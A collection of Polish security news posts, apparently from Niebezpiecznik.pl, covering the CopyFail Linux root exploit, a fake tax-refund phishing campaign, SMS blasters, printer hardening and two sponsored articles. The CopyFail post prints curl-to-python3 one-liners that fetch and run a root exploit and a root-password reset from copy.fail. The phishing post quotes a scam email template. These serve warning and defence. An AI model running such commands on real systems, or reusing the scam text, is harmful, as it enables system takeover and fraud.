Niebezpiecznik.pl (tylko główna)

Nowoczesne kadry w dobie cyfrowej transformacji

2026-04-30T12:25:53Z

Gwałtowny rozwój technologii, ze szczególnym uwzględnieniem sztucznej inteligencji (AI), stanowi przełom dla wielu profesji. Ale to tylko jeden z powodów głębokich transformacji zachodzących w strukturze kadr sektorów IT, telekomunikacji czy cyberbezpieczeństwa. Na tempo tych procesów rzutuje dziś także niestabilna sytuacja geopolityczna. Sektor ICT mierzy się z eskalacją liczby cyberataków oraz ich rosnącą różnorodnością. Taka dynamika wymusza na organizacjach stałe podnoszenie kompetencji obecnych pracowników oraz intensywne pozyskiwanie nowych specjalistów. Jak z głową “przekwalifikować się” na inne stanowisko — i które konkretnie? W kogo pracodawca powinien dziś inwestować? Tego dowiecie się z poniższego artykułu.

Sektorowe Ramy Kwalifikacji – „branża dla branży”

Sektorowe Ramy Kwalifikacji (SRK IT, SRK CYBER oraz SRK TELE) to narzędzia opracowane w ramach wspierania rozwoju Zintegrowanego Systemu Kwalifikacji (ZSK), przygotowane w Instytucie Badań Edukacyjnych – Państwowym Instytucie Badawczym przez zespół ekspertów zgodnie z ideą „branża dla branży”.

SRK zawierają uporządkowane opisy specyficznych dla tych branż kompetencji ujętych w kategoriach: wiedza, umiejętności i kompetencje społeczne. SRK stanowią bezpośrednie rozwinięcie Polskiej Ramy Kwalifikacji (PRK) poprzez adaptowanie ogólnych standardów do specyficznych realiów rynkowych. Dzięki stopniowaniu kompetencji na poszczególnych poziomach można planować rozwój zawodowy w danym obszarze sektora.

SRK CYBER (2024): Nowo opublikowana rama będąca bezpośrednią odpowiedzią na zapotrzebowanie rynku w obszarze bezpieczeństwa cyfrowego.
SRK IT: Aktualizacja wersji z 2015 r. Dekadę temu sektor IT postrzegano głównie jako wsparcie biznesu, dlatego konieczna była zmiana definicji sektora, ale także uwzględnienie nowych rozwiązań technologicznych, „zielonych kompetencji” i dodanie rozbudowanego słownika zawierającego niemal 400 definicji pojęć.
SRK TELE: Aktualizacja wersji z 2015 r. z podobnymi zmianami jak w SRK IT, dodatkowo wyraźnie zaznaczono linię podziału między obszarami takimi jak infrastruktura pasywna i aktywna oraz detaliczne i hurtowe usługi telekomunikacyjne.

Kto najbardziej skorzysta z SRK IT, SRK CYBER i SRK TELE?

Omawiane Sektorowe Ramy Kwalifikacji uwzględniają specyfikę poszczególnych sektorów, aktualne trendy i kierunki rozwoju, dlatego są szczególnie użyteczne dla pracodawców. Zyskują oni wsparcie w analizie luk kompetencyjnych, planowaniu ścieżek rozwoju pracowników, tworzeniu siatki płac oraz w procesach rekrutacyjnych.

Z kolei pracownicy dzięki SRK mogą świadomie projektować swoją karierę, samodzielnie wyznaczając cele w zakresie samokształcenia i rozwoju zawodowego.

SRK są również przydatne w obszarze edukacji i szkoleń. Uczelnie, szkoły i placówki oświatowe mogą dostosowywać realizowane programy nauczania do aktualnych i realnych potrzeb rynku pracy. Firmy szkoleniowe mogą skuteczniej projektować specjalistyczne szkolenia, szyte na miarę potrzeb i oczekiwań swoich klientów.

Zintegrowany System Kwalifikacji

U podstaw ZSK leży idea uczenia się przez całe życie – kompetencje można potwierdzać nie tylko poprzez edukację formalną, ale także dzięki doświadczeniu zawodowemu czy nauce własnej. Kwalifikacje uzyskane w drodze walidacji (sprawdzenia efektów uczenia się) są zintegrowane w portalu kwalifikacje.gov.pl. W samym obszarze „Technologie cyfrowe – IT” w Zintegrowanym Rejestrze Kwalifikacji znajdują się obecnie 1462 kwalifikacje, w tym 33 wolnorynkowe, zgłoszone bezpośrednio przez firmy (np. „Modelowanie i skanowanie 3D”, „Zarządzanie cyberbezpieczeństwem”).

Podmioty branżowe mogą aktywnie współtworzyć ten system, zgłaszając propozycje nowych kwalifikacji, prowadząc procesy walidacji i certyfikacji czy uczestnicząc w pracach eksperckich. Warto wykorzystać te narzędzia, aby nadać swojej firmie kluczową rolę w sektorze.

Więcej informacji:

O ZSK i ZRK: https://kwalifikacje.gov.pl/
SRK CYBER, zaktualizowane SRK IT i SRK TELE dostępne wkrótce na portalu ZSK

Artykuł przygotowany w ramach projektu „Wspieranie dalszego rozwoju Zintegrowanego Systemu Kwalifikacji w Polsce (ZSK6)” (FERS.01.08-IP.05-0001/23) z dofinansowaniem z Funduszy Europejskich dla Rozwoju Społecznego. Jego autorem jest Instytut Badań Edukacyjnych – Państwowy Instytut Badawczy. Za jego publikację otrzymaliśmy wynagrodzenie.

Masz Linuksa? To go szybko załataj!

2026-04-30T12:23:09Z

Ujawniono atak na wszystkie Linuksy wydane po 2017 roku. W sieci pojawił się też kod exploita. Uruchomienie go na podatnej maszynie daje atakującemu prawa roota. Szczęście w nieszczęściu: ta podatność to Local a nie Remote Privilege Escalation. Mimo to, polecamy szybkie wgranie aktualizacji wszystkim, nie tylko adminom maszyn na których pracuje wielu użytkowników lub hostowane są kontenery.

Jak sprawdzić, czy jesteś podatny?

Aby zweryfikować, czy Twój system jest podatny, wystarczy uruchomić ten 732 bajtowy skrypt Pythona. Na szybko można wykonać poniższe polecenie — po prostu skopiuj je i przeklej do terminala z poziomu zwykłego użytkownika. Jeśli po jego uruchomieniu zobaczysz uid=0(root) i zostaniesz rootem, to jesteś podatny na atak:

curl https://copy.fail/exp | python3 && su

Skopiowałeś i przekleiłeś bez sprawdzenia co jest pod URL-em? Błąd. Nigdy tego nie rób! “Pajpowanie” kodu z internetu do shella to proszenie się o kłopoty. I nie — wejście przeglądarką na URL i sprawdzenie kodu nie wystarczy, bo złośliwa strona może serwować Twojej przeglądarce co innego niż curlowi pod tym samym adresem (tzw. User-Agent cloaking). Poprawne zachowanie to lektura wyświetlonego kodu pod kątem złośliwych instrukcji (jeśli sam nie potrafisz tego ocenić, poproś o pomoc swojego asystenta AI) a potem skopiowanie kodu do lokalnego pliku i dopiero wtedy jego uruchomienie w interpreterze Pythona.

Na marginesie, jeśli chcesz nauczyć się testować swoje środowiska pod kątem różnych podatności, dziur i ataków, to wpadnij na nasze bestsellerowe, szkolenie z testów penetracyjnych pt. Bezpieczeństwa Sieci i Systemów Komputerowych. Przez 3 dni hakujemy tam na różne sposoby różne maszynki, pokazujemy techniki i narzędzia, dzięki którym jesteś w stanie sprawdzić swoje środowisko pod kątem różnych ataków i w konsekwencji znacznie podnieść jego bezpieczeństwo. To szkolenie to bardziej warsztaty, bo realizujemy je w duchu minimum teorii, maksimum praktyki. Oto jego najbliższe terminy:

Kraków: 13-15 maja 2026r. — UWAGA: zostały tylko 3 wolne miejsca
Ostatnio ktoś zarejestrował się 10 kwietnia 2026r. → zarejestruj się na to szkolenie

Wrocław: 17-19 czerwca 2026r. — zostało 6 wolnych miejsc
Ostatnio ktoś zarejestrował się 18 marca 2026r. → zarejestruj się na to szkolenie

Warszawa: 01-03 lipca 2026r. — zostało 7 wolnych miejsc
Ostatnio ktoś zarejestrował się 26 kwietnia 2026r. → zarejestruj się na to szkolenie

ZDALNIE: 26-28 sierpnia 2026r. — zostało 9 wolnych miejsc
Ostatnio ktoś zarejestrował się 30 marca 2026r. → zarejestruj się na to szkolenie

Dlaczego ten atak jest możliwy i dlaczego jest tak istotny?

Luka jest wynikiem błędu logicznego w kodzie kryptograficznym jądra (uwierzytelnianie przez AF_ALG i splice()), który umożliwia niewielkie zapisy w pamięci podręcznej stron (page cache), co może naruszyć integralność binarek setuid, takich jak /usr/bin/su.

A teraz po polsku :) Praktycznie każdy Linuks wydany po 2017 roku jest podatny. Skutki tej dziury mogą być dramatyczne na środowiskach współdzielonych, czyli hostingach i serwerach z Kubernetes, procesami CI czy nawet w różnego rodzaju sandboxach, bo błąd może pozwolić na ucieczkę z kontenera i przejęcie systemu hosta przez użytkownika (tenanta).

Tą podatność / atak nazwano CopyFail (CVE-2026-31431). Patche są już w mainline kernela (a664bf3d603d) od 1 kwietnia. Co ciekawe, ta luka została wykryta przez skaner “dopalony” AI.

Są plusy tego ataku…

Jeśli masz maszynkę, do której zapomniałeś hasła roota, to teraz masz szansę je sobie nie tyle przypomnieć, co zmienić na dowolne :-) Po prostu zhackuj swojego Linuksa tym atakiem używając tego polecenia:

$ curl https://copy.fail/pw | TARGET_USER=root python3 | su

I błagamy, daj znać, że drugi raz nie zrobiłeś pajpa do pythona bez czytania tego, na co kierujesz curla.

Mam Linuksa — co robić, jak żyć?

Jeśli uruchomiłeś powyższy skrypt Pythona i zobaczyłeś uid=0(root) to jesteś podatny. W pierwszej kolejności zaktualizuj kernel do mainline a664bf3d603d. Jeśli nie możesz wgrać aktualizacji, to wyłącz moduł algif_aead wykonując następujące polecenia:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead 2>/dev/null || true

I na koniec, jeszcze raz zapraszamy wszystkich adminów do udziału w naszym szkoleniu z Bezpieczeństwa Sieci Komputerowych — tam nie tylko nauczycie się jak hakować Linuksy na różne sposoby, ale także dowiecie się, jakie zabezpieczenia można wdrożyć, aby nawet pojawienie się takich błędów jak CopyFail nie było problemem dla Waszej maszyny (albo było problemem zdecydowanie mniejszym).

⚠️ Uwaga na fałszywe e-maile o zwrocie podatku!

2026-04-29T08:47:13Z

Otrzymujemy zgłoszenia dotyczące kampanii, w której przestępcy podszywając się pod pracowników Krajowej Administracji Skarbowej informują o przysługującym zwrocie podatku. Atak zaczyna się od e-maila, a kończy na stronie internetowej, gdzie ofiara, która uzupełni formularz, pieniądze straci, a nie odzyska.

Wiele wariantów e-maila

Poniżej podajemy przykładowe wartości dla pól nadawcy i tytułu:

Od: puesc.mf.gov.pl (mail@deal.dk) Temat: WAŻNE: Środki czekają na Ciebie – działanie wymagane {Noreply} #644643435

Od: przelewy.puesc.gov.pl (noreply@jiotix.asia) Temat: PILNE: Zwrot podatku – ostatni krok {Noreply} #982617231

E-maile wyglądają bardzo profesjonalnie. Ich treść ma kilka wariantów, ale generalnie każdy z nich zachęca do kliknięcia w przycisk, aby rozpocząć procedurę zwrotu podatku, wskazując że ostateczny termin to 30 kwietnia. Mamy więc presję czasu:

Potwierdzenie zwrotu nadpłaconego podatku dochodowego
Szanowna Pani / Szanowny Panie,
Na podstawie art. 72 § 1 Ordynacji podatkowej oraz po dokonaniu weryfikacji rocznego zeznania podatkowego PIT-37 za rok 2025, Krajowa Administracja Skarbowa stwierdza wystąpienie nadpłaty w podatku dochodowym od osób fizycznych. Kwota nadpłaty podlega zwrotowi na rachunek bankowy wskazany przez Podatnika, po uprzednim potwierdzeniu danych w systemie PUESC. Zgodnie z art. 77a ww. ustawy, zwrot nadpłaty zostanie zrealizowany w terminie 3 dni od dnia potwierdzenia rachunku. Poniżej przedstawiamy szczegóły obliczonej kwoty oraz niezbędne instrukcje.

Wysokość zwrotu należnego
2210,25 zł słownie: dwa tysiące dwieście dziesięć złotych 25/100

Podstawa prawna zwrotu:
– art. 75 § 1 oraz art. 77a ustawy z dnia 29 sierpnia 1997 r. Ordynacja podatkowa (t.j. Dz.U. z 2025 r. poz. 932).
– rozporządzenie Ministra Finansów w sprawie zwrotu nadpłat podatkowych (Dz.U. z 2024 r. poz. 1582).

Zwrot pieniędzy teraz — Link prowadzi do bezpiecznego formularza w portalu PUESC. Termin potwierdzenia upływa 30 kwietnia 2026 r. UWAGA – termin zastrzeżony. Zgodnie z procedurami KAS, brak potwierdzenia danych rachunku bankowego w terminie do 30 kwietnia 2026 r. spowoduje zawieszenie wypłaty do czasu ponownej weryfikacji. Aby otrzymać środki w najbliższym terminie wypłat, prosimy o niezwłoczne działanie.

Po kliknięciu w link, ofiara jest kierowana na strony pod różnymi domenami (wiele z nich nie jest wykrywanych jako złośliwe przez przeglądarki). Strony wyglądają wiarygodnie i wyłudzają dane osobowe: PESEL, nazwisko, adres, a następnie numer karty płatniczej.

Jak jeszcze można wykryć, że to scam?

Wykrycie, że ma się do czynienia z atakiem jest możliwe, jeśli stosuje się do następujących, dobrze znanych rad:

Sprawdź dokładnie adres e-mail nadawcy. (tu żaden nie jest w domenie gov.pl)
Nie podawaj numeru karty płatniczej, jeśli chcesz OTRZYMAĆ ZWROT pieniędzy. (podanie numeru karty, z niewielkimi wyjątkami, które można pominąć, służy do jej obciążenia)

Otrzymałem taką wiadomość, co robić, jak żyć?

Jeśli nie uzupełniłeś formularzy swoimi danymi osobowymi i nie podałeś numeru karty, możesz spać spokojnie.

Ze względu na skalę ataku, brak wykrywania stron jako złośliwe przez przeglądarki oraz zbliżający się termin rozliczeń podatkowych postanowiliśmy w tej kampanii wysłać ostrzeżenie użytkownikom naszej aplikacji CyberAlerty. Aplikacja CyberAlerty jest darmowa i dostępna zarówno na Andoida jak i na iPhone. Nie wymaga rejestracji a jedyne co robi, to wysyła Ci ostrzeżenia przed atakami, jeśli zauważymy nowy, istotny i masowy atak, który może spowodować kradzież Twoich danych lub pieniędzy albo zagraża Twojej prywatności. Aplikację pobierzesz z oficjalnego sklepu Google lub Apple.

Dziękujemy wszystkim Czytelnikom, którzy przesłali nam informacje o tych złośliwych wiadomościach To dzięki Wam możemy ostrzegać innych!

Nadanie paczki przez InPost Mobile. Jak zrobić to wygodnie i bezpiecznie?

2026-04-28T11:06:48Z

Nadanie paczki może być szybkie i wygodne, ale tylko wtedy, gdy cały proces jest dobrze uporządkowany. InPost Mobile pozwala nadać przesyłkę bez drukowania etykiety i ogranicza liczbę kroków, a przy okazji pomaga zmniejszyć ryzyko błędów.

Nadanie paczki zaczyna się przed uruchomieniem aplikacji

Zanim użytkownik kliknie „nadaj”, musi zrobić rzecz najważniejszą: dobrze przygotować przesyłkę. InPost zaleca, by opakowanie było dopasowane do zawartości, odpowiednio wytrzymałe i wypełnione tak, aby rzeczy nie przemieszczały się w środku. Bezpieczne nadanie paczki zaczyna się od pudełka, nie od ekranu telefonu.

To ważny aspekt, który często bywa lekceważony. Niesłusznie. Źle zabezpieczona paczka może zamienić prostą wysyłkę w reklamację, a pośpiech przy pakowaniu zwykle mści się właśnie wtedy, gdy przesyłka trafia do obiegu.

InPost Mobile upraszcza nadanie paczki

Najmocniejszy punkt aplikacji jest bardzo konkretny: InPost Mobile pozwala nadać paczkę bez drukowania etykiety. Po uzupełnieniu danych i opłaceniu przesyłki użytkownik dostaje w aplikacji 9-cyfrowy kod nadania oraz kod QR ważny przez 30 dni. Z ich użyciem można dokończyć nadanie paczki poprzez Paczkomat lub Appkomat.

To rozwiązanie jest wygodne, ale jego znaczenie nie sprowadza się do wygody. Kiedy płatność, kod i samo nadanie są zamknięte w jednym oficjalnym narzędziu, użytkownik rzadziej zaczyna szukać informacji po mailach, zrzutach ekranu i wiadomościach SMS. A właśnie w takim rozproszeniu najłatwiej o błąd.

Przy samym urządzeniu proces też został uproszczony. InPost podaje, że skrytkę można otworzyć zdalnie z poziomu aplikacji, a alternatywą jest zeskanowanie kodu QR. Mniej kroków oznacza tu nie tylko oszczędność czasu, ale też mniej okazji do nerwowych decyzji.

Jak bezpiecznie nadać paczkę?

Samo nadanie paczki przez Paczkomat zostało maksymalnie uproszczone. W aplikacji InPost Mobile cały proces można przejść bez drukowania etykiety:

otworzyć aplikację InPost Mobile,
wybrać opcję „Nowa przesyłka”, a następnie „Nadaj”,
wskazać rozmiar paczki i sposób dostawy,
wpisać dane odbiorcy,
opłacić przesyłkę online,
odebrać kod nadania oraz kod QR,
przy dowolnym automacie Paczkomat otworzyć skrytkę zdalnie w aplikacji, zeskanować kod QR albo wpisać kod na ekranie urządzenia,
włożyć paczkę do środka, zamknąć skrytkę i potwierdzić nadanie.

To rozwiązanie jest wygodne zwłaszcza wtedy, gdy liczy się czas. Nadanie paczki można zrealizować o dowolnej porze, bez stania w kolejce, bez drukowania etykiety i bez dopasowywania planu dnia do godzin otwarcia placówki.

Jeśli wolisz, skorzystaj z nadania paczki przez oficjalną stronę InPost: https://inpost.pl/SzybkieNadania.

Najsłabszym ogniwem bywa wiadomość spoza oficjalnego kanału

W praktyce problemem nie jest dziś samo nadanie paczki, tylko wszystko, co dzieje się wokół niego. Wiadomość o dopłacie. Link do „potwierdzenia danych”. SMS, który wygląda zwyczajnie, bo zawiera słowo „paczka” i odwołuje się do pośpiechu. To znany mechanizm. InPost ostrzega, że nigdy nie wysyła SMS-ów z informacją o dopłatach, a podejrzane komunikaty należy sprawdzać u źródła.

Ten kontekst bezpieczeństwa jest dziś równie ważny jak sama wygoda nadania. Rządowe materiały przypominają, że podejrzane SMS-y można zgłaszać do CERT Polska na numer 8080, najlepiej przekazując całą wiadomość w oryginalnej formie. Najbezpieczniejsze nadanie paczki to takie, które użytkownik prowadzi w jednym oficjalnym kanale i bez odruchowego klikania w linki. To praktyczny wniosek z zaleceń InPost oraz CERT Polska.

Co naprawdę warto zrobić przed nadaniem paczki?

Najprostsze zasady zwykle działają najlepiej:

dobrze zabezpieczyć zawartość i wypełnić wolne przestrzenie w opakowaniu, żeby przesyłka nie przemieszczała się w środku;
nadać paczkę przez InPost Mobile bez etykiety, zamiast rozpraszać proces między różne kanały;
sprawdzać kody i przebieg nadania w aplikacji, a nie w podejrzanych wiadomościach;
nie reagować odruchowo na SMS o dopłacie albo „problemie z przesyłką”, tylko zweryfikować sprawę u źródła;
aktualizować aplikację i zabezpieczyć telefon hasłem lub biometrią, bo to ogranicza najprostsze scenariusze nadużyć;
podejrzane SMS-y przekazywać do CERT Polska na 8080.

Wniosek

W dobrze ułożonym procesie InPost Mobile nie jest gadżetem, tylko narzędziem, które domyka nadanie paczki w jednym miejscu: od opłacenia przesyłki po kod potrzebny do otwarcia skrytki. To porządkuje proces. Uspokaja go. I ogranicza liczbę momentów, w których użytkownik działa chaotycznie.

Dobrze zorganizowane nadanie paczki to mniej chaosu, mniej błędów i mniej okazji dla oszustów. Fałszywe komunikaty o przesyłkach niestety stały się jednym z najprostszych narzędzi phishingu, a więc przewidywalność jest realną wartością.

Autorem niniejszego artykułu jest firma InPost, a za jego publikację otrzymaliśmy wynagrodzenie

Jeżdżą po mieście i atakują telefony korzystając z SMS Blasterów ukrytych w bagażnikach

2026-04-29T08:05:31Z

Wyobraź sobie, że stoisz w korku. Albo spacerujesz po chodniku z psem. Tymczasem w samochodzie na światłach siedzi typ, który uśmiecha się i w tym samym momencie zarabia tysiące złotych. Bo w bagażniku samochodu ma “SMS Blastera“. Tym sprzętem przejmuje łączność Twojego smartfona i wstrzuje Ci SMS-a z informacją od Twojego banku. A facetowi w garniturze, który właśnie Cię minął, SMS-a o “niezapłaconej paczce”. Co najgorsze, przed tym atakiem nie obronią Cię żadne filtry po stronie operatora…

SMS Blaster wykorzystywany przez gang w Turcji

SMS Blastery w natarciu

W ciągu ostatnich miesięcy służby w różnych częściach świata zatrzymały osoby korzystające z tzw. “SMS Blasterów” ukrytych w samochodach. SMS Blastery to odpowiednio skonfigurowane IMSI Catchery, czyli fałszywe stacje BTS, które przepinają na siebie sygnał telefonii komórkowej okolicznych smartfonów, a następnie wysyłają na te smartfony wiarygodnie wyglądające SMS-y podszywające się pod różne instytucje.

Efekt? Taki sam jak przy spoofingu SMS, ale atak tego typu nie jest możliwy do odfiltrowania przez operatorów, bo nie przechodzi przez ich infrastrukturę. Jest też dodatkowe zagrożenie wynikające z tego ataku — ofiary nie mogą korzystać z połączeń alarmowych, co może skończyć się tragiczniej niż strata pieniędzy.  

Jak to działa i dlaczego jest groźne?

Ten atak w brutalny sposób wykorzystuje to, jak zaprojektowane są sieci komórkowe. Telefony komórkowe automatycznie łączą się z nadajnikiem o najsilniejszym sygnale. Gdy “SMS Blaster” znajdzie się blisko Ciebie — na przykład w stojącym obok na światłach aucie — Twój telefon bez Twojej wiedzy przeloguje się do przestępczej sieci. Wtedy atakujący może zrobić kilka groźnych rzeczy:

Wysłać Ci SMS-a z fałszywym linkiem (tzw. smishing), swobodnie podmieniając pole nadawcy. Operator Twojej sieci nawet tego nie zauważy, w przeciwieństwie do ataków wykorzystujących różne internetowe bramki do fałszowania nadpisu SMS, które regularnie opisujemy.
Odciąć Cię od prawdziwej sieci operatora, uniemożliwiając korzystanie ze smartfona także do wezwania pomocy 
Pobrać identyfikujące Cię metadane, które następnie można wykorzystać do “śledzenia” Twojej lokalizacji. Przy czym SMS Blastery nie są tym zainteresowane, to raczej domena profesjonalnych IMSI Catcherów wykorzystywanych przez służby (które swoją drogą nazywają je “jaskółkami”). 
Podsłuchać prowadzone przez Ciebie rozmowy telefoniczne lub nieszyfrowany ruch internetowy. Aby tego dokonać urządzenie musiałoby wykonać atak MITM, złamać szyfrowanie (co jest możliwe dla niektórych standardów) lub wymusić połączenie po nieszyfrowanych protokołach. Ale to również domena IMSI Catcherów a nie SMS Blasterów, głównie ze względu na koszt.

SMS Blaster – materiały policji

Przestępcy korzystają z różnych sztuczek i narzędzi, ale niezależnie od użytej przez nich metody ataku, jeśli jesteś dobrze przygotowany i zabezpieczony, ciężko będzie im wykraść Twoje dane lub pieniądze albo naruszyć Twoją prywatność. Pytanie, czy wiesz jak poprawnie się zabezpieczyć? Jeśli nie, zaproś nas do swojej firmy — przeprowadzimy dla Was krótkie szkolenie i przygotujemy Was na wszystkie groźne sytuacje, jakie mogą Was spotkać. A jeśli jesteś osobą prywatną, to wpadnij na nasz otwarty wykład Jak Nie Dać Się Zhackować?, który jest dedykowany osobom nietechnicznym i w trakcie którego uczymy jak zabezpieczyć się w kontekście prywatnym, a nie służbowym.

Trójka z Kanady

W kanadyjskim Toronto aresztowano trzech mężczyzn, którzy przez kilka miesięcy (!), bo co najmniej od listopada 2025, wozili po mieście sprzęt udający stację bazową (BTS). Według Toronto Police Service to pierwszy znany przypadek użycia takiej technologii w Kanadzie. Sprawa nosi kryptonim Project Lighthouse, a zatrzymanym postawiono łącznie 44 zarzuty.

To nie są nowe ataki

Tego typu ataki to nie nowość. Ponad 10 lat temu na rynku były dostępne tzw. SMS Messanging Gateways, które można było kupić przez chińskie portale. I które wtedy służyły bardziej do wysyłania SMS-owego spamu, reklam okolicznych biznesów. Dziś ta sama technologia jest wykorzystywana nie do napędzania klientów, a do kradzieży środków. Warto też wspomnieć tę prezentację z BlackHata z 2013 roku o bieda-imsi-catcherach z przerabianych femtocelli.

Incydent z Toronto to nie jedyny tego typu przypadek. W 2024 w Brazylii rozbito gang poruszający się Jeepem z potężną anteną w bagażniku i laptopem na tylnym siedzeniu. Zatrzymany kierowca otrzymywał 1000 reali tygodniowo za samo “wożenie się” po bogatych dzielnicach Sao Paulo. Sprzęt automatycznie namierzał telefony w promieniu 5 metrów i wysyłał SMS-y podszywające się pod znane banki. Podobny incydent miał miejsce w Omanie, gdzie policja zatrzymała turystkę z Chin. Kobieta z wypożyczonego auta masowo rozsyłała linki phishingowe przy użyciu sms blastera.  

Mam smartfona — co robić, jak żyć?

Mając smartfona jesteś na ten atak podatny, niezależnie od rodzaju urządzenia czy systemu operacyjnego. Choć na razie brak doniesień o tego typu atakach realizowanych na terenie naszego kraju, warto dmuchać na zimne. Dlatego: 

Wyłącz obsługę przestarzałej sieci 2G w swoim smartfonie. Wiele tanich SMS Blasterów opiera się na tzw. “downgrade attack” do sieci drugiej generacji, z której łatwo przechwycić ruch.
Traktuj każdą wiadomość SMS jako całkowicie niezaufaną — bo taka de facto jest.
Ważne rozmowy prowadź przez szyfrowane komunikatory E2EE (np. Signal).

Warto też wszelkie podejrzane trudności w nawiązaniu połączenia ze 112 zgłaszać do UKE. Kto wie, może przyczynicie się do wykrycia pierwszej tego typu operacji w Polsce.

Dlaczego drukarki w stanie fabrycznym to stan zagrożenia, a nie gotowości

2026-04-27T16:45:56Z

Załóżmy, że masz poukładane serwery, endpointy, segmentację, EDR, SOC nie płacze. Czujesz spokój. Ogród zen. I wtedy przypominasz sobie o drukarkach. W rogu stoi MFP (ang. Multifunction Printer, drukarka wielofunkcyjna) . Niby mebel. A tak naprawdę: komputer z dyskiem, usługami sieciowymi, historią zadań, skanami, adresami e-mail i panelkiem, na którym ludzie klikają wszystko, co mruga. Jeśli zostawisz je w konfiguracji fabrycznej, to nie masz „drukarki”. Masz hosta z dość ciekawą powierzchnią ataku. I cyberninja o tym wie…

Ten tekst otwiera cykl o bezpieczeństwie urządzeń drukujących w środowisku firmowym. W kolejnych rozdziałach będziemy przechodzić przez etapy „Drogi Samuraja”: od stanu fabrycznego, przez hardening i monitoring, aż po druk w duchu Zero Trust i budowę spójnego ekosystemu obrony. Dlatego, jeśli chcesz podążać tą ścieżką razem z nami – śledź kolejne odsłony. Każda część cyklu będzie kolejnym krokiem na tatami, kolejnym elementem sztuki ochrony danych, której Samuraj nie odkłada na później.

SPIS TREŚCI

Rozgrzewka na macie – ustawienia fabryczne jako punkt startowy
Nie jesteś bezbronny – utwardzanie urządzeń
Hardening drukarek – jak się do tego zabrać?
Masz flotę? Potrzebujesz zarządzania

Nie masz czasu na lekturę całości artykułu? Zacznij od filmu! Zobacz, jak patrzymy na to zagadnienie, a po konkrety i przykłady — kontynuuj lekturę artykułu.

Rozgrzewka na macie

Nowoczesne urządzenia wielofunkcyjne są projektowane tak, żebyś mógł je postawić i po 10 minutach usłyszeć: „drukuje!”. Dla użytkownika to ideał: zero pytań, zero błądzenia po ustawieniach, minimalny udział IT.

Takie urządzenie wydrukuje wszystko bez pytania o tożsamość użytkownika. Skanowanie i kopiowanie działają równie swobodnie: jeden szybki ruch, jeden „scan to email”, i dokument z pieczątką wylatuje poza firmę bez śladu w logach. A gdy urządzenie wystawia równocześnie panel webowy, SMB, FTP, WebDAV, SNMP czy IPP, otwiera w murach sieci tyle bram i furtek, ile dróg i ścieżek prowadzi do oblężonego zamku – i zazwyczaj nikt ich nie patroluje.

Do tego dochodzą nieszyfrowane transmisje i domyślne hasła administratora, które nadal są jednym z najczęstszych wektorów ataku.

Jednak z perspektywy bezpieczeństwa ustawienia fabryczne należałoby traktować wyłącznie jako tryb startowy. Urządzenie bez utwardzonej konfiguracji jest jak wojownik bez zbroi – pierwszy cios cyberninja może go powalić.

Dobra wiadomość: nie jesteś bezbronny.

Zbroją, która będzie Cię chronić jest hardening urządzenia, czyli takie skonfigurowanie jego ustawień, żeby było trudniejsze do zaatakowania, przejęcia albo wykorzystania jako „furtka” do firmowej sieci.

Wystarczy, że robisz to raz, porządnie, a potem utrzymasz jako standard – w duchu NIST SP 800 (800-53/171/88/40) – czyli zestawu wytycznych amerykańskiego National Institute of Standards and Technology dotyczących bezpieczeństwa systemów IT – i z kryptografią, której nie da się zbyć tekstem „to tylko drukarka” (FIPS 140-3).

– Utwardzanie MFP to nie jest ‘włączenie jednego checkboxa’. To dopasowanie urządzenia do polityk bezpieczeństwa organizacji – tak, żeby drukarka była tak samo przewidywalna i kontrolowana jak serwer czy laptop – komentuje Darek Szwed, ekspert Canon Polska w obszarze bezpieczeństwa danych.

Hardening drukarek: Jak się do tego zabrać?

Po pierwsze: Rozpoznaj taktykę przeciwnika. Drukarka też ma swoje słabe punkty, które mogą stać się celem ataku.

Zanim zaczniesz cokolwiek „zabezpieczać”, zrób ten prosty test mentalny: Czy pozwoliłbyś, żeby w twojej sieci stał komputer z dyskiem i kilkoma usługami, którego nikt nie patchuje, nikt nie loguje, a panel admina jest dostępny z VLAN-u użytkowników?

Jeśli odpowiedź brzmi „nie”, to gratulacje. Przy okazji… właśnie opisałeś typową drukarkę w trybie fabrycznym.

Załóżmy, że firma dokonała dobrego wyboru – urządzenia drukujące spełniają normy bezpieczeństwa, mają certyfikowane moduły, wspierają szyfrowanie, audyt, kontrolę dostępu. To jednak tylko pozorne bezpieczeństwo.

Bo urządzenie „prosto z pudełka”: otwiera zbyt wiele portów, udostępnia zbędne protokoły, nie wymusza haseł, pozwala drukować wszystko każdemu, nie szyfruje transmisji, nie zapisuje logów, nie integruje się z żadną polityką firmy…

To jak posiadać najlepszy miecz… i walczyć gołymi rękami.

To nie jest teoria. To jest codzienność w biurach. Domyślna konfiguracja MFP jest wygodna dla użytkownika, ale zdradliwa dla bezpieczeństwa i śmiertelna dla infrastruktury.

Po drugie: Nie klikaj na czuja. Użyj Security Settings Navigator

Jeśli teraz myślisz: „OK, to wejdę w ustawienia i wyłączę wszystko” – stop.
Samuraj nie macha mieczem na oślep.

W japońskim uniwersum możesz sięgnąć po narzędzie typu Security Settings Navigator, które prowadzi cię przez hardening jak mistrz podczas treningu w dojo:

zadaje kilka pytań o środowisko (dosłownie kilka, bez doktoratu),
podpowiada zmiany zgodne z dobrymi praktykami NIST: minimalizacja uprawnień, ograniczenie usług, segmentacja, szyfrowanie,
na końcu daje ci konkretną listę ustawień do wdrożenia.

– W praktyce drukarki rzadko mają przypisanego jednego „właściciela”, a w efekcie są trochę niczyje. Admin sieci widzi je jako kolejny adres IP do ogarnięcia, security skupia się na serwerach i firewallach, a sama drukarka ląduje gdzieś pomiędzy – podłączona do sieci, z własnym systemem i usługami, których nikt na co dzień nie pilnuje.

Security Settings Navigator pomaga domknąć ten temat bez zgadywania. Zamiast klikania „na wyczucie” prowadzi krok po kroku i zamienia ogólne zasady bezpieczeństwa w konkretne, sensowne ustawienia urządzenia. Bez wróżenia z fusów i przypadkowego klikania wszystkiego, co da się wyłączyć – mówi Daniel Mazur, dyrektor działu technicznego w Inforoffice Polska.

Po trzecie: Spójrz zagrożeniom w oczy.

Chcesz prostą zasadę NIST-ową, która robi największą różnicę? Powiąż operacje z tożsamością.

Jeśli dziś u ciebie jest tak:

każdy może podejść i wydrukować/zeskanować,
„PIN jest wspólny”,
logi są „jakieś” albo żadne,

to masz idealne warunki, żeby w razie incydentu ktoś powiedział: „to nie ja” – i na tym kończy się badanie ścieżek wroga.

Zrób więc to, co robisz w innych systemach:

włącz uwierzytelnianie (karta/PIN/SSO),
rozdziel role (użytkownik vs admin vs użytkownik vs serwis),
ogranicz funkcje zależnie od roli,
loguj i audytuj.

